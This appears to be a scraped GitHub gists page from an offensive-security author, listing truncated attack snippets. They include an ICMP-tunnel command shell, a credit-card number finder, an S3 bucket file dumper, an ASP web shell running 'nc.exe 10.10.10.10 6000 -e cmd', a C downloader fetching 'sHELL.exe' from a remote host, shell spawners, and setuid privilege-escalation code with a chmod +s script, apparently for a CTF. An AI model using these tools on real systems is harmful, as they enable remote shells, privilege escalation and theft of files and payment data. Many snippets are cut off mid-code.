Navigation Menu

Skip to content

Instantly share code, notes, and snippets.

View int0x33's full-sized avatar
🎯
Focusing

ZER0 int0x33

🎯
Focusing
View GitHub Profile
@int0x33
int0x33 / ping.py
Last active January 14, 2019 16:19
ICMP Shell for Linux using ICMP tunneling
import os
import select
import signal
import socket
import struct
import sys
import time
import subprocess
from scapy.all import *
@int0x33
int0x33 / pwn.py
Created January 14, 2019 16:19
ICMP Shell for Linux using ICMP tunneling
from scapy.all import *
import sys
interface = sys.argv[1]
dstip = sys.argv[2]
def pkt_callback(pkt):
# pkt.show() # debug statement
if pkt[Raw].load == "ECMD":
print "Enter command to execute:"
@int0x33
int0x33 / cardfinder.py
Last active January 24, 2019 08:42
credit cards - gotta find 'em all
import re
import sys
RED = "\033[1;31m"
BLUE = "\033[1;34m"
CYAN = "\033[1;36m"
GREEN = "\033[0;32m"
RESET = "\033[0;0m"
BOLD = "\033[;1m"
REVERSE = "\033[;7m"
@int0x33
int0x33 / s3-monster.py
Created January 14, 2019 16:21
Me eatz all da filez
#!/usr/bin/env python
import subprocess
import os.path
import sys
import urllib2
from xml.etree.ElementTree import parse
def main():
#First let's request and save the AWS XML
xml = getXML()
#Now let's parse the XML
<%
Sub Page_Load
'1st test
Dim objShell : Set objShell = Server.CreateObject("Wscript.Shell")
objshell.Run("C:\www\nc.exe 10.10.10.10 6000 -e cmd")
End Sub
%>
#define PTL "https"
#define DMN "10.10.10.10"
#define FLE "sHELL.exe"
#define CURL_STATICLIB
#include <stdio.h>
#include <curl/curl.h>
size_t write_callback(void *buffer, size_t size, size_t nitems, void *userp){
FILE *file = (FILE*)userp;
#include<stdio.h>
#include<stdlib.h>
int main()
{
system("/bin/bash");
}
#include <stdlib.h>
#include <unistd.h>
#include <string.h>
#include <sys/types.h>
#include <stdio.h>
int main(int argc, char **argv, char **envp)
{
gid_t gid;
uid_t uid;
#include <stdlib.h>
#include <unistd.h>
#include <string.h>
#include <sys/types.h>
#include <stdio.h>
int main(int argc, char **argv, char **envp)
{
char *buffer;
#!/bin/bash
cc /tmp/shell.c -o /home/flag03/shell
chmod +s /home/flag03/shell